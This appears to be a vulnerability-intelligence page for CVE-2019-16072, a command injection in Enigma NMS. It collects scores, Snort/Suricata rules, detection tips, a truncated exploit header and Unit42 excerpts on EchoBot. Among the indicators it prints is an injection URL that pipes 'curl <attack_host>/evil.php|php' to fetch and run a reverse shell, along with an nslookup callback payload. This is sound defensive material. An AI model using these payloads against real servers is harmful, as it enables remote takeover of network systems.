CVE-2019-16072
published 2020-03-20CVE-2019-16072: An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
25.28%
97.7th percentile
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netsas | enigma_network_management_solution | <= 65.0.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20<attack_host>:<web_svr_port>/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1↗
command|nslookup+{{interactsh-url}}
bytes↗
|7c| (pipe character) in ip_address parameter of /cgi-bin/protected/discover_and_manage.cgi URI
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029158; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
snort
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029159; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
- →The exploit uses HTTP GET (PoC script) but the ET Snort rules trigger on POST method to the vulnerable CGI endpoint — monitor both GET and POST to /cgi-bin/protected/discover_and_manage.cgi with action=snmp_browser and a pipe character (|, hex 7c) in the ip_address parameter.
- →The exploit drops and serves a PHP reverse shell file named evil.php via a temporary HTTP server; detect outbound curl requests from the NMS host fetching .php files from attacker-controlled infrastructure.
- →The Nuclei template uses an OOB/OAST DNS callback (interactsh) to confirm blind command injection; look for unexpected DNS lookups originating from the NMS host as a sign of exploitation.
- →The exploit authenticates with HTTP Basic Auth before injecting; correlate successful Basic Auth logins to /cgi-bin/protected/main.cgi followed immediately by requests to discover_and_manage.cgi with shell metacharacters in ip_address.
- →The vulnerability is exploited in-the-wild by the Mirai variant EchoBot; correlate CVE-2019-16072 exploitation attempts with other EchoBot IoT exploit signatures.
- ·The Nuclei template is marked 'verified: false', meaning the detection logic has not been confirmed against a live target and may produce false positives or false negatives.
- ·The exploit PoC uses HTTP GET, but the ET Snort rules are written for POST; deployments should ensure both HTTP methods are covered when writing detection rules for this CGI endpoint.
- ·Exploitation requires valid credentials (HTTP Basic Auth); unauthenticated scanning will not trigger the vulnerability, so detections relying solely on unauthenticated probes will miss authenticated attacker sessions.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2f22-7m2c-fwgc: An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65
ghsa_unreviewed·2022-05-24
CVE-2019-16072 [HIGH] GHSA-2f22-7m2c-fwgc: An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
VulnCheck
netsas enigma_network_management_solution Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-16072 [CRITICAL] netsas enigma_network_management_solution Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
netsas enigma_network_management_solution Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
Affected: netsas enigma_network_management_solution
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; https://www.f5.com/labs/articles/thr
Suricata
ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)
suricata·2019-12-16·CVSS 9.8
CVE-2019-16072 [CRITICAL] ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)
ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029158; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_B
Suricata
ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)
suricata·2019-12-16·CVSS 9.8
CVE-2019-16072 [CRITICAL] ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)
ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)
Rule: alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029159; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofp
Exploit-DB
Enigma NMS 65.0.0 - OS Command Injection
exploitdb·2019-09-09·CVSS 9.8
CVE-2019-16072 [CRITICAL] Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - OS Command Injection
---
#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection #
# NETSAS Pty Ltd Enigma NMS #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16072 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma
Nuclei
Enigma NMS < 65.0.0 - Authenticated OS Command Injection
nuclei·CVSS 9.8
CVE-2019-16072 [CRITICAL] Enigma NMS < 65.0.0 - Authenticated OS Command Injection
Enigma NMS < 65.0.0 - Authenticated OS Command Injection
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
Template:
id: CVE-2019-16072
info:
name: Enigma NMS < 65.0.0 - Authenticated OS Command Injection
author: 0x_Akoko
severity: critical
description: |
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
impact: |
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
2020-03-20
Published
Exploited in the wild